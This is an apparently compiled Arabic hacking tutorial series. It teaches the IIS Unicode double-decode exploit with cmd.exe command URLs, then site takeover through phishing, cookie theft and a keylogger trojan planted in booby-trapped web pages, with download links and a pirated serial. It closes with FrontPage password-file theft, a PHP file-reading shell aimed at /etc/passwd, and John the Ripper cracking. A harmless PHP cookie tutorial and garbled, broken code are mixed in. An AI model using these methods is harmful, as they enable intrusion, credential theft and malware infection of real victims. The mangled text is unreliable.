"دراسة مفصلة وبعمق في الـ "UniCode
اول:
====
متى وجدت اليونى كود؟
Found On 15 May 2001 BY NSFOCUS
ثغره اليونى كود ::هى عباره عن ثغره تسمح للهاكر بأن يشغل اوامر بالقوه بصلحيه مسموح بها )اى يكون
له امتياز ( IUSR_machinename account
و تحدث هذه الثغره اصل نتيجه ان روتين ال cgiالموجود على الويب سرفر نفسه يفك شفره عنوان الموقع
مرتين و هذا ما نسميه بال ) DeCodeل تقلق ستفهم بعد ذلك (
تعالى معى خلينى اوضحلك ايه الخرابيط الى انا كاتبها فوق دى
* - /scripts/و هذا الفولدر لديه امتيازات تنفيذيه على السرفر )اى يمكن لليوزر تنفيذ اى امر على الوب
سرفر من خلله ( وهذا الفولدر ايضا هو المستخدم فى تنفيذ سكربتس ال cgiالموجوده على الوب سرفر و
140
بالتحديد هذا الفولدر يسمى الفولدر التنفيذى اى ( executable directory
و طبعا هذا الفولدر ليس له اسم ثابت هذا فقط مثال و لكن يمكن ان يكون له اسماء كثيره على الملقم iisو
ملحوظه هامه ::ل يوجد على كل ملقم iisهذا الفولدرالتنفيذى اى executable directory
و اعتقد ان الصديق بلك هنتر و الخ هكس قد ذكرو معظم اسامى هذه الديريكتورز فى شرحهم )فأنا اريد ان
اربط الدروس مع بعض حتى تكون سلسله متكامله (
* ؟ -علمه الستفهام تخيلو حتى علمه الستفهام فى هذه الثغره لها دور فهذه العلمه تعنى الحاله التى ينفذ
بها المر )طبعا مش فاهم يعنى ايه ( و ل يهمك تعالى معى افهمك يعنى ايه علمه الستفهام تعنى كلمه
argumentو هذه الكلمه هى التى تعنى الحاله التى سينفذ بها المر اى انه امر مثل ينفذ فى لحظه ثم
ينتهى مثل copyمثل ام انه امر مثل ينفذ و لكن يستمر مفعوله و حقيقه ان طبعا معظم الوامر التى
نستخدمها هى الوامر العاديه و هى من نوع argument /cو هذا ال c/يعنى ان المر ينفذ فى لحظه ثم
ينتهى
تعالى افهمك اكثر ::لو عندك ويندوز 2000افتح ال cmdبتاعك و اكتب هذا ) (?/ cmdو اضغط
انتر ,سيظهر لك كلم كثير جداا و لكنى اخترت منه جزء بسيط فقط للتوضيح و انت عليك الباقى
شوف ايه الى راح يظهر لك ::
Starts a new instance of the Windows 2000 command interpreter
[CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF
]][S] [/C | /K] string/
C Carries out the command specified by string and then terminates/
K Carries out the command specified by string but remains/
(S Modifies the treatment of string after /C or /K (see below /
Q Turns echo off/
(D Disable execution of AutoRun commands from registry (see below /
هذا جزء بسيط جداا مما راح يظهر لك و لكن تعالى نشوف هذا الجزء ايه معناه اول يقولك ::
Starts a new instance of the Windows 2000 command interpreterو هذه
الجمله تعنى بالعربيه بدايه حاله جديده من مترجم ال ويندوز 2000و هذا طبعا وضح لنا ان كل cmd
يمكن ان يتخكم صاحبه فى حالته حسب ما يفتح او يغلق ال . argumentsو بعدها يظهر لنا
argumentsكثيره و منها الذى نستعمله دائما فى الثغره و هو c/شوفو كده ما المكتوب امامه ::
Carries out the command specified by string and then terminatesو هذا
الكلم معناه انه ينفذ المر الموجود فى سطر الوامر ثم ينتهى و طبعا هذا للوامر العاديه التى نعرفها
تعالو نشوف السطر الى تحتيه ::سوف نجد انه يتكلم عن argumentل نراه فى ثغره اليونى كود و هو ال
k/شوفو ايه مكتوب امامه::
Carries out the command specified by string but remainsو طبعا معناه انه ينفذ
الوامر الموجوده فى السطر و لكن يستمر مفعولها )ما زلت ابحث عن اوامر مثل هذه و لكن هذا ما هو
مكتوب امامى و لكن تقدر تقول انها الوامر التى تأخذ فتره طويله حبتين مثل pingمثل (
و مثل هناك argumentأخر مثل Q/و هذا نستخدمه فى اغلق تفعيل امر echoكما هو واضح فى
المثال فوق
و هناك الكثير من هذه ال argumentsو طبعا منها ما هو اساسى ل يمكنك التحكم فيه )يعنى فتحه او
غلقه مثل ال c/و ال ( k/و هناك اخرين يمكنك ان تجعلهم onاو offو بهذا تكون انت تتحكم بحاله ال
cmdخاصتك )ياريت تنفذ المر و تقرأ المكتوب لنك راح تلقى تفاصيل الفتح و الغلق بالتفصيل ( و
اصبروا على قليل حتى انتهى من المتحان الول فى MCSEفى خلل اسبوعين ان شاء ال تعالى و بعد
ذلك نعود اكثر قوه و نشرح لكم هذه النقطه بالتفصيل ان شاء ال بس اصبرو شوى
141
اعتقد انك الن فهمت ما هى ال argumentsو ما فائده c/التى تكتبها فى الثغره و انا متأكد انك ل تعرف
معناها .
تعالو نروح لنقطه سهله و بسيطه جدااا فى الثغره ,انت تشغل ال cmd.exeلنك تريد ان تتحكم بالموقع و
تغير الندكس و الخ و و لكن تعالى مثل نشغل اى ملف تانى ياترى كيف نشغله ؟
انا راح اقلك كيف ::كل ما عليك فعله هو ان تقوم بوضع اسم الفايل الذى تريد تشغيله بهذا الشكل
Ping.exe+PRINTبل من cmd.exe?/cو بهذا تكون قد شغلت الفايل الذى تريده
). ( enjoy thisحيث تصبح الثغره بهذا الشكل ::
http://issserver/scripts/..%5c..%.../ping.exe+PRINT
* - +c/و بالتالى كما عرفنا فوق انا c/هى ال argumentلل cmd.exeاو الحاله التى سينفذ عليها
ال cmdالمر اما علمه ال +التى بجانب ال c/فهى بمقام المسافه بين الكلمتين فى الثغره و لكن ل يمكننا
اسبدالها بمسافه عاديه و بعدها يكون المر الذى يحمله سطر الوامر لينفده ثم علمه +ثانيه و بعدها اسم
الدرايف الذى تعرض محتوياته على الشاشه حاليا .
**و نأتى الن لهم نقطه فى الثغره و هى اساسا سبب الثغره كما ذكرنا فى اول الكلم )هو ان سبب الثغره
يكون حل شفره العنوان اكثر من مره (و هذا ما نطلق عليه ال decodeو انا شخصيا افصل الديكودز على
انه تحليل حتى نصل لبسط الحل كما فى الرياضيات يعنى simplyfieyاى تبسيط و فك المعادله تعالو
خلينا نفهمكم هذا على الثغره نفسها ::
و تعالو ندخل و نتعمق اكثر فى تفاصيل الديكود للثغره بعد ان عرفنا فكرتها ::
شوفو فيه ماده اسمها computer logicو الماده دى راح درس فيها شئ يسمى HexaDecimal
Valuesو هذه ال valuesهى اساس الديكود الذى نفعله فى الثغره اى ان كل حرف صحيح او حركه
مثل /فى الكمبيوتر لها ما يسمى بال hex valueتعالى اوضحلك اكثر ::
مثل 20% :تعنى مسافه )(space
هذا مثال بسيط و اعتقد انك فهمت الن كلمى و طبعا يوجد جدول لهذه ال hex valuesالمساويه
للحروف و الحركات العاديه فى الكمبيوتر ,اذن اعتقد انك ادركت تماما الن انك ترسل hex values
عوضا عن الحروف و الحركات العاديه الى السرفر و هذا بالضبط ما نسميه التحليل او فك الشفره او ال
decode
تعالى نخش فى تفاصيل الثغره اكثر و سنأخذ الحركه التى نشرح عليها هى ال ( slash) /حيث انها من
اساسيات الديكود فى هذه الثغره ::
شوف فى جدول ال hex valueراح نجد ان ال , 5c% = /طبعا هذا هو الديكود الول الذى ستفكر الن
فى انك تحذف ال /و تضع بدل منها هذا ال valueفتنجح الثغره و لكن انا اقول لك هذا خطأ لن هذا هو
الديقود الول و انا ذكرت ان الديكود يحدث مرتين او ممكن اكثر يعنى لو وضعت هذا الديكود الول فستجد ان
ال iisلديه القدره على ان يمسك هذا الديكود و يمكنعه من التنفيذ و لذلك علينا ان نحلل هذا ال valueحتى
يتم الديكود التانى فتنجح الثغره
142
%35 = 5
c = %63
و بالتالى نجد انفسنا قد خدعنا ال iis checkerبأننا حللنا ال شفره مرتين و بالتالى فسنحصل فى المقابل
على الصل و هو /و بالتالى تكون قد نجحت الثغره .
فهمتم الن شباب معنى ديكود العنوان مرتين و فهمتم اساس الثغره و الديكود مرتين ليس معناه تكرار
التحليل الول مرتين و لكن معناه تحليل و فك التحليل الول اى simplifyالى ابسط و اطول صوره ممكنه
فى نفس الوقت
و عشان توضح اكثر معك راح احطلك كيف التركيبه الصح للتحليل ::
%255c %25 = % 5 = 5 c = c = %5c
%%35c % = % %35 = 5 c = c = %5c
c = %5c = %63 5 = %35 % = % %%35%63
c = %5c = %63 5 = %35 % = %25 %25%35%63
ارائيتم التحليل طبعا فى الخر يجب ان يساوى الديكود الصل و هو كما واضح فى مثالنا كل التحليلت تساوى
5c%و كما ذكرنا / = 5c%و لكننا حللنا هذا الرمز الى اطول و ابسط تحليل حتى نخدع ال iis
. checker
و فى النهايه بعد فهمنا للثغره و اساسها هيا تعالو نطبقها مع بعض
سوف نضع الثغره فى هذا الشكل ::
http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s
و ستدخلون على الموقع بنجاح و لكن اكيد تلحظون شئ جديد قد زاد على الثغره و هذا الشى هو s/+
هذا الرمز
و عندما تدمج هذا الرمز مع الثغره كما فى المثال السابق سوف تأتيك لسته بكل فايل كبير و صغير فى
كمبيوتر الويب سرفر
و ال تعبت فى هذا الدرس و تعبت فى قرائه المعلومات و تجميعها عن اليونى كود حتى اصل لهذا الشكل
الخوه و ان شاء ال انتظرو موضوعى القادم بعدما اكون انهيت امتحانى الول فى ) MCSEادعولى
بالنجاح ( و سيكون عباره عن تلخيص للتعامل مع شبكات ويندوز 2000و كيفيه اختراقها و فائده ال
.WIN2000 RESOURCE KIT
انتهى،،،
143
" تدريب على عملية الختراق بواسطة اليونيكود "
كثر الكلم عن إختراق المواقع بأنواعه واليوم عندي شرح عن الختراق عن طريق اليونيكود أو بالصح
تطبيق عملي على كيفية الختراق عن طريق اليونيكود وهذا النوع يعتبر للمبتدئين وهو الذي بإذن ال
سيوصلهم إلى طريق الحتراف .....
******************
بسم ال نبدأ...
سيكون التطبيق على جهازك وهو مثل الموقع أو السيرفر وتقوم بتطبيق الدرس كما وأنك على موقع
مصاب.....
لكي تتدرب على إختراق المواقع قم بتركيب نظام ويندوز 2000على جهازك .وفي نفس السيدي تبع النظام
تقوم بإضافة سيرفر IISوذلك عن طريق :
*1قم بالذهاب إلى لوحة التحكم.
*2قم بالنقر على إضافة إزالة برامج.
*3قم بالنقر على زر " إضافة إزالة مكونات ويندوز ".
*4قم بوضع علمة صح على الخيار الول “.”IIS
هذا بالنسبة لكيفية تنزيل السيرفر..
اما عن كيفية التدرب على الجهاز أي اختراقه فقم بالتالي:ـ
قم بوضع الموقع في مجلد wwwrootالموجود داخل مجلد Inetpubطبعا هتدخل عليه بعد ما تشغل
السيرفر IISعن طريق
/http://127.0.01
وليجاد الثغرة في الجهاز والتدرب عليها قم بتشغيل برنامج عمران سكان أو أي برنامج اخر للفحص عن
الثغرات تبع اليونيكود وقم بوضع العنوان تبعك الي هو /http://127.0.0.1
وقم بتطبيق المهارات التي تعلمتها في اختراق المواقع المصابة باليونيكود.
انتهى،،،
144
" شرح مفصل لكيفية اختراق المواقع المجانية "
اول=-
ثانيا=-
عليك معرفه بعض بيانات صاحب الموقع مثل اليميل..الخ وتستطيع التوصل له ببعض الطرق=-
ثالثا=-
لنــبدأ الشرح
النقطه الولى لمعرفه نوعيه اصدار المتصفح لصاحب الموقع سهله جدا فكل موقع يصمم على حسب نوعيه
المتصفح الخاص بصاحبه ويكت لنا في نهايه الموقع يفضل تصفحه بدقه معينه ويعطيك اصدار الكسبلور
المناسب لتصفح الموقع=المناسب لتصميمه=نفس الصدار الخاص بهوهذه اسهل نقطه واهم شئ فيها
لختراق المواقع المجانيه
واما بالنسبه للوصول الى الضحيه فهناك عده طرق ويجب ان يكون معاك اكواد الهتمل الخاصه بسرقه
الكوكيز))ساضعها هنا لحقا((والن بعدما حصلت على هذه الكواد تضعها في صفحه وتحاول جذب الضحيه
للتوجه لها وهناك عده طرق
-1تاخذ عنوان ماسنجر او ايميله من اي مكان في الموقع اذا وضعه وتحبه وتصير موثوق
عنده))هههههههه حب مصلحه((وتعطيه صفحتك الى حطيت فيها الكوكيز او ترسل له ملف سارق الباسوورد
145
-2مثل تحدد نوعيه الشركه الى مقدمه الستضافه المجانيه للموقع فمثل اذا كان عنوان الموقع
/http://www.name.8m.com
فهذا معناه ان الموقع مقدم من شركه فري سيرفر FreeServerSوتستطيع معرفه النطاق المحدده
بالدخول الى المواقع المجانيه وعمل تسجيل وستظهر لك انواع الدوامين المتاحه))....8m.s5الخ
وتسجل عندهم وسيرسلون لك البيانات ويكون لهم تصميم خاص جدا وانت عليك بسرقه نفس التصميم
وتغيير محتوى الرساله))طبعا بالعنقليزي((وارسال رساله منه تتطلب منه فتح موقع))موقعك الى فيه
الكود((مثل لعمل التحديثات اواي شئ اخروهو لن يشك اذا رأى تصميم رسالتك وطريقتك نفس طريقه موقع
الشركه وسيفتح الموقع حال
واذا لم يضع ايميله فهناك طريقه وهى انك مثل تدخل سجل الزوار عندهوتكتب شي يقهره و يجذبه بقوه يعني
مثل تقول له تصميم موقعك مسروق حرفيا من هذا الموقع وتعطيه اللنك))وهو للمره المليون اقلكم الموقع
الى فيه الكود((او اي طريقه اخرى من ذكائكواذا لم تجد ايميله او سجل زوار فهناك عليك اختراق الموقع
بالثغرات وهو صعب جدا جدا
يطول شرحها عشان كدا بحط شرحه في موضوع تاني مرفق معاه الكواد الخاصه بالمتصفحات مع طريقه
التعامل معها لسرقه كوكيز الضحيه وتوصيله الى جهازك
طريقه اختراق المواقع المجانيه التى اصحابها لديهم متصفح IE 5 IE 5.5
هذه هي الطريقه التى تستعملها اذا استطعت الوصول الى صاحب الموقع ))راجع درس "سهوله اختراق
المواقع المجانيه"((
اول لن نعتمد على الكوكيز في سرقه الباسوورد وسنعتمد على تروجان قوي وخطير يسجل كل شي في
الكيبوردوليكشفه النورتون انتي فايروس وهو الذي سنضعه في صفحه ملغومه اول مايفتحها الضحيه ينزل
الى جهازه,,,,
اول قم بتحميل برنامج keykey2000وهذا البرنامج يسجل كل شي بالكيبورد والشياء الى كنت تعمل بها
ويرسلها على اليميل وانا مجربه وليستطيع النورتون الجديد والزرار الثلثه للغاء العمليات النشطه في
النظام ايقافه ووصلته
http://www.mikkotech.com/kk2000pro.exe
والسيريال نمبر
SN: K100-43-109-0-793218E876A4C9-29
والبرنامج سهل جدا ول يحتاج لشرح واذا اردتم شرحه كلمونيوالن بعدما جهزت ملف الباتش بهذا البرنامج
قم بتحميل برنامج godwillوهو البرنامج الخاص للغام الموقع على انترنت اكسبلور 5و ))5.5هذه هي
سر المهنه((ووصلته
http://www.thecorpz.org/activex/gwpackage.zip
146
====================الشــــرح=====================
انا لن اقوم بعمل شرح بالصور وهذا شرح بسيط للبرنامج لنه سهل جدا
Htmlوكل شغلنا هنا لكي نقوم بعمل صفحه ملغومه وعندما نضغط عليه تجي عده اختيارات وانت اختار
منها
General optionsوستظهر لك مربع عرض الصفحات الملغومه وهذا شرح سريع لها
enter exe fileومن هنا تضع الباتش الى سويته بشرط ال يكون حجمه كبير جدا))هل تفيدنا هذه
المعلومه في شئ((
enter htmlلستعراض صفحه من جهازك ثم الغامها وحط علمه صح جانب use default
pageليقوم البرنامج بعمل صفحه جديده
وفي السفل HTA File Nameوهنا تضع اسم الصفحه وبعد النتهاء من ذلك نختار كلمه Doneليقوم
البرنامج بعمل الصفحه))وسيكون مكانها في نفس مجلد البرنامج((
http://www.thecorpz.org/html/activesploits.html
===================نهايه الشـــرح====================
وبعدما تقوم بوضع الصفحه الملغومه في النت واعطائها للضحيه بالطرق التى شرحتها سابقا سينزل
التروجان على جهازهعندما يقوم بفتح موقعك الملغوم ولم يبقى لك الن انت تنتظر في بريدك الى حطيته في
التروجان المعلومات عن الضحيه مثل))الموقع واليميل,,الخ((وهذه الطريقه تنفع ايضا لسرقه الشتراكات
واساميه في المنتديات وايميله.
147
انتهى،،،
مقدمة
تعد الكعكات ) الـ ( cookiesمن الوسائل المفيدة في انشاء مواقع اكثر تفاعلية ،فبواسطتها ستتمكن من
معرفة هل قام المتصفح بزيارة موقعك من قبل ام ل ..
في هذا الدرس سنتعرف على الكعكات و كيف يمكننا استخدامها ...
معلومات عامة
وتختلف المعلومات التي تخزن ضمن ملفات الكوكيز من موقع لخر ،ولكن ليس بإمكان هذه المواقع
استرجاع أي معلومات إضافية عنك أو عن جهازك ،باستثناء تلك المعلومات المخزنة في الملف النصي
الخاص بها ،والتي تم إرسالها من قبل الموقع ،وبذلك ل تستطيع هذه المواقع الطلع على مضمون ملفات
الكوكيز الخرى ،أو أي ملفات خاصة على جهازك .
وبإمكان الموقع تغيير المعلومات الموجودة ضمن ملفات الكوكيز أو إضافة معلومات جديدة كلما قمت بزيارة
الموقع .يتم تخزين بعض ملفات الكوكيز في الذاكرة فقط ،بحيث يجري حذفها مباشرة عند إغلقك
المتصفح ،ولكن معظمها وتسمى "ملفات الكوكيز المثابرة" ،يتم تخزينها لفترة محددة على القرص الصلب
لحين انتهاء صلحيتها وقد تدوم صلحيتها مدة أشهر أو حتى سنوات .أما بعض ملفات الكوكيز التي تعرض
148
تاريخ صلحية لتاريخ سابق ،فإنها ُتحذف مباشرة ول ُتخّزن على قرصك الصلب .وتعود المعلومات المخزنة
في ملفات الكوكيز إلى مزودات الموقع الذي أصدرها فقط ،وقد تعمم بعض الشركات الكبرى ملفات الكوكيز
التي تصدرها على جميع مزوداتها ،لتنسيق المعلومات المتضمنة ،ولكي ل تصدر كل من مزوداتها ملفات
كوكيز للمستخدم ذاته ،عند زيارته لصفحات مختلفة في الموقع .
:code
: valueالقيمة ...فقط قيم نصية ...ل يمكنك وضع مصفوفة كقيمة و هذا أامر مهم ...لكن انتبه بامكانك
وضع مصفوفة لكن بطريقة اخرى ...؟ كيف ؟ :استخدم الدالة serializeلتحويل اي متغير في بي اتش
بي الى شكل نصي و من ثم استخدم unserializeلعادته الى الشكل الطبيعي .
: expireاي عدد الثواني من بدية عصر اليونكس ) 1يناير ( 1970و التي بعدها سيقوم المتصفح على
جهاز المستخدم بحذف الكعكة ...و هنا ثلث حالت :
<--أوًل :أن يكون الوقت المعطى كمدخل اكثر من الوقت الحالي على جهاز العميل و عندها تخزن الكعكة
على جهاز العميل و تحذف عند انقضاء المدة .
<--ثانيًا :أن يكون الوقت المعطى كمدخل اقل من الوقت على جهاز العميل و عندها ل يقوم المتصفح على
جهاز العميل بتخزينها و اذا وجدت كعكة بنفس السم فانه يحذفها حتى لو لم تنتهي المدة .
<--ثالثًا :إذا لم تحدد وقتا فان الكعكة تخزن في ذاكرة المتصفح و تفقد حالما يغلق المستخدم الموقع .
مثال :
:code
>?
;(setcookie('site','http://www.palhackerz.com/',time()+3600
?<
من الدوال المفيدة دالة timeو التي ترجع الوقت الحالي على شكل عدد الثواني من بداية عصر اليونكس )
149
1يناير . (1970
مثال :
:code
>?
;(setcookie('site','',time()-360000
?<
ملحظات :
-1عندما تحدد زمنا ماضيًا اجعله قيمة كبيرة لكي تتفادى فارق التوقيت بين الخادم و العميل .
-2لكي تعدل أي كعكة عليك حذفها و إرسالها من جديد .
><body
>?
;(setcookie('site','palhackerz.com',time()+20000
?<
><body/
><html/
بل لو كان هنالك مجرد سطر فارغ قبل علمة البداية ?< فلن تعمل الدالة ... setcookie
?<
><html
150
><body
><body/
><html/
مثال :
:code
>?
;['echo $_COOKIE['site
?<
-ماذا لدينا ؟
-1الملف : user.phpيقوم الملف بعمليتين :
<--الولى :تحديد اللون الذي اختاره الزائر .
<--الثانية :عرض نموذج اختيار الللون و حفظ اللون المختار
-----------------------*/
151
..Cookies-Based Background Selector
<Created By : "Rasha"<rasha@h4palestine.com
For : h4palestine.com
/*-------------------------
}()function display_form
<?
<html>
<body>
<FORM/>
<FORM/>
?>
152
}()function set_color
;global $_GET
;(setcookie('color',$_GET['color'],time()+36000
;('header('Location:index.php
}()function get_color
;global $_COOKIE
}((['if(isset($_COOKIE['color
;['return $_COOKIE['color
}else{
;"return "#FFFFFF
}()function clear_color
;(setcookie('color',$_GET['color'],time()-36000
;('header('Location:index.php
selection //
}('if ($do=='display_form
;()display_form
153
{}("elseif ($do=="set_color
;()set_color
{}("elseif ($do=="clear_color
;()clear_color
{
?<
><h1مرحبا بك <h1/>.....
><br
><br
><body/
><html/
انتهى،،،
154
" شرح برنامج السطورة God Willفي تلغيم الصفحات "
155
http://www.geocities.com/love2002_il/godwill16.zip
لنبدأ:
بعد تجهيز ملف الــ htmlالمراد تلغيمه ،و ملف الباتش ،شغل برنامج Godwillبعد تحميل ،و ستجد
أمامك النافذة التالية...
156
اضغط على الخيار General Optionsلتنتقل للنافذة التالية...
157
اضغط زر Gen
سيظهر لك في مجلد البرنامج ملف له نفس السم الذي وضعته في الحقل رقم ...enter Output 3و هذا
الملف يمثل الصفحة الملغومة...
قم بتحميل الصفحة على إحدى المواقع المستضيفة للصفحات مثل
/http://www.tripod.lycos.co.ukو احتفظ بعنوان صفحتك الملغومة جيدا...
عند فتح الضحية لصفحتك الملغومة ...سيقوم الباتش بتحميل نفسه بنفسه بدون أن يحس الضحية بأي شيء
) طبعا إل إذا كان لديه ( zone Alarmو عند إعادته لتشغيل الكمبيوتر ،سيقوم الباتش بتشغيل نفسه ...و
ستصلك رساله منه برقم أي بي جهاز الضحية و رقم البورت الذي تم فتحه...
و هون بقى ،أنت بتعرف شغلك.
انتهى،،،
158
" وداعا ً للبرنامج السطورة ومرحبا ببرنامج "NOOP4
هذا البرنامج من اجل دمج بالباتش وتهيئة علي اساس انه صفحه علي النت
اسم البرنامج هو noob 4.0
من ااجل عيون الجوكر والجميع =======================================
=============================
-1البرنامج
الصوره توضح ما هوالشرح عند ضغطك علي البرنامج وفتحه سوف تاتي هذه الشاشه
=================
======================
=============================
layout 2للبرنامج<<<<====:::
159
==================================================
===================
executable file 3لختيار الباتش <<<<====:::
-7لتحديد مكان الباتش من علي الجهاز
160
وفي نهايه عمل البرنامج يعطي لك المكان الذي تريد ان يحفظ في الصفحه المدموجه.
وصلة البرنامج...
انتهى،،،
161
" معلومات مهمة عن المواقع التي تدعم الفرونت بيج "
>ةةةةة<
و اذكر أخيرًا بأني اؤمن بأن المخترق ما هو إل انسان وظيفته البرمجة و ادارة و تحليل النظم و الشبكات و
ليس انسان همه هو معرفة القليل
من المور التي تساعده في التخريب و العبث بما تعب به الخرون و تضييع الوقت في الدردشة و التسكع
بمقاهي النترنت ،و لذا فافترض بأن
ما أقوله سيكون واضحًا و ل يحتاج لـ . Screen Capture
@ مقدمة :
تسعى شركات التسكين بأنواعها توفير شتى شبل الراحة لعملئها ،فتجدهم يقدمون العروض و التخفيضات
لرضاء العملء مثل دعم لـ PHPو
CGIو Perlو SSLو FTPو . SQL
و بالنسبة لمدارء المواقع Webmastersفإن البرنامج المفضل لهم لتصميم مواقعهم هو Microsoft
Office FrontPageو الذي كما هو مبين يأتي
162
مع حزمة ، Officeاذ يتميز بسهولة استعماله كما انه يوفر بعض البرمجيات مثل عداد الزوار ،و لذا تقدم
شركات التسكين دعم كامل للبرنامج .
) ملحظة :سأتكلم حاليًا عن الحزم التي أتت بعد حزمة الصدار الثاني (
هو عبارة عن حزمة من البرامج يتم تثبيتها في الخادم Serverالخاص بشركة التسكين التي لها قالبية
لدعم بعض الخصائص .
private_/
vti_bin_/
vti_cnf_/
vti_log_/
vti_pvt_/
vti_txt_/
/vti_adm_/..
/vti_aut_/..
الثاني ل يهمنا بقدر ما يهم المجلد الول اذ أنه الخاص بالمشرف ول تستطيع الستفادة منه اذا لم تحصل على
كلمة المرور الخاصة به .
كما يوجد ملفان هما :
shtml.exe/..
fpcount.exe/..
-الملف : service.pwdو فيه يتواجد المعرف و كلمة المرور الخاصة بالمشرف مشفرة بمقياس DES
.
-الملف : service.grpو فيه يتواجد المعرفين من مشرفين و . authors
-ملفي deptodoc.btrو : doctodep.btrو فيه يتواجد مسارات الملفات التي تم تحميلها على
الخادم ،فاذا قمت بتنزيله فتستطيع معرفة الملفات
الموجودة بالموقع .
و في الغالب ل تستطيع معاينة محتويات المجلد اذ يوجد في المجلد الرئيسي للموقع ملف htaccess.يقوم
بمنع الجميع ) المالك و المجموعة و
163
الزوار ( من معاينة المجلد و محتوياته .
) ملحظة :ان عدم وضع أي صلحية على المجلدل يعني بأنها تعتبر ثغرة و لكن ضعف من الناحية (
يعتمد التصال بين العميل و الـ FrontPage Extension Serverعلى بروتوكول الـ . HTTP
فلو اردنا معاينة عداد الزوار عن طريق برنامج الـ FrontPageفانه يتم ارسال طلب Requestللخادم
ثم يمرره الخادم بالـ FrontPage Extension Server
و الذي يمرره بالتالي ببرمجيات الخادم مثل ، fpcount.exeو من ثم يكرر تمريره مرة أخرى إلى الـ
Extension Serverو إلى الخادم و يظهر المخرجات
لـ العميل ،علمًا ان هذه التصالت تتم عبر جدار نار .
كما ذكرنا سابقًا ان أغلب شركات التسكين تسعى لراحة العملء ،فتجدها تدعم خدمة الـ FrontPageو
ذلك لتحميل الصفحات للموقع علمًا بأنها
تدعم بروتوكول الـ FTPو تحميل الملفات و انشاء المجلدات عبر المتصفح اعتمادًا على البرمجيات التي
تعمل بناحية الخادم .
و الن قم بتنفيذ التالي لمعرفة كيفية التصال بالـ : FrontPage Extension Server
) ملحظة :سأتكلم حاليًا عن حزمة الـ XPو التي ل تختلف أبدًا عن الحزم الباقية إل في بعض النقاط
الشكلية (
يوجد العديد من الطرق لمعرفة قابلية الموقع لدعم الفرونت بيج نذكر منها :
) ملحظة :قد ل تجد ملف _ vti_inf.htmlو لكن هذا ل يعني أن الموقع ل يدعم الخدمة ،كما أنه ل
يعتبر ثغرة (
-قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPageأم ل .
-قم بمعانية ملف _ vti_inf.htmlبواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ،مثال :
164
http://www.Victim.com/_vti_inf.html
-و عند معاينة الصفحة ستجد جملة ، FrontPage Configuration Informationفهذا معناه أن
حزمة الـ FrontPage Extension Serverقد تم تثبيتها
في الخادم بنجاح .
-قم بالنقر بزر الفأرة اليمن على الصفحة ،ثم قم باختيار . Source Code
-قم بالبحث عن "FPVersion="Versionحيث Versionتشير للصدار الخاص بالخدمة .
-قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPageأم ل .
-قم بمعانية المجلد بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ،مثال :
http://www.Victim.com/_vti_cnf
-قم بالنقر بزر الفأرة اليمن على الصفحة ،ثم قم باختيار . Source Code
-قم بالبحث عن الشفرة التالية :
vti_generator:Programe
-قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPageأم ل .
-قم بالنقر بزر الفأرة اليمن على الصفحة ،ثم قم باختيار . Source Code
-قم بالبحث بين ترميزي الرأس > <Head></Headعن الشفرة التالية :
-حيث Programeيرمز لنوع البرنامج و اذا كان البرنامج هو Microsoft FrontPage X.0يتبين
لنا بأن الخادم الخاص بالموقع يدعم الفرونت بيج و
الصدارة الخاصة به هي . X
165
) ملحظة :تساعد هذه الطريقة في معرفة بعض المعلومات عن الخادم و المخرجات هي نفس مخرجات
الطريقة السابقة (
-من قائمة Startقم باختيار Runو اكتب بالنافذة التي ستظهر . Telnet
-قم بالتصال بالموقع عبر المنفذ 80بالشكل التالي :
اذا عثرت على موقع يدعم هذه الخدمة و لم يتم وضع صلحيات على مجلد الـ _ vti_pvtقم بالتالي :
) ملحظة :عليك اللمام بلغة تعمل على ناحية الخادم و في حالتنا فهي الـ ، PHPكما أن على الموقع
الضحية دعم هذه اللغة (
>?PHP
;Echo $get
;FClose $open
?<
166
و قمنا هنا برفع ملف PHPللخادم يقوم بفتح ملف غير معين ثم يحضر محتوياته على حسب حجمه بالبايت
ثم يعرضه ثم يغلق الملف ،و الن كل
ما عليك فعله الن هو الدخول على الموقع عبر المتصفح و الحاقه بـ بعنوان الملف الذي حملته و المتغير
fileو الملف الذي تريد معاينة الشفرة
المصدرية الخاصة به ،مثال :
http://www.Victim.com/uploded_file...../../etc/passwd
حيث uploded_fileيشير لسم الملف الذي قمت بتحميله ،و تستطيع اضافة اوامر تسمح لك بمعاينة
الملفات و المجلدات الموجودة في الخادم .
انتهى،،،
167
" اختراق المواقع التي تدعم الفرونت بيج "
NT - Unix
-1وسف أقوم الن بشرح طريقة لمعرفة هل هذه المواقع تدعم frontpageأم ل؟
--------------------------------------------------
168
=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============
ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلحظ نلحظ وجود
username:passwd
اسم المستخدم والباسوورد
يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف serviceيحتوي على
user / password
وهذا مضمون الملف
operator:hi9LHn9wAMuKM
حيث اسم المستخدمoperator:
الباسوورد المشفرة هيhi9LHn9wAMuKM:
ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إل نفك تشفيره
وهذا يتم ببرامج كثير
=)=(Crack Jack
=)=(John The Ripper
169
وراح يظهر لك بهذا الشكل
>c:\john
واكتب
cd RUN
وبتدخل المجلد ليصبح بهذه الطريقة
>c:/john/RUN
ألحين نكتب أوامر برنامج John The Ripper
وهي
====
john -i:all passd.txt
--------------------------
يبحث لك عن جميع النواع والحتمالت
====
john -i:Alpha passwd.txt
----------------------------------
يبحث عن الحرف الصغيرة
====
john -i:Digits passwd.txt
----------------------------------
يبحث عن الرقام
====
john -single passwd.txt
---------------------------------
أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم
--------------------------------------------------------------------------------
وبعد ماتجرب كل هذي الوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ول ل إذهب إلى
john.pot
الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها
--------------------------------------------------------------------------------
يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
)(1
frontpage
بعدين
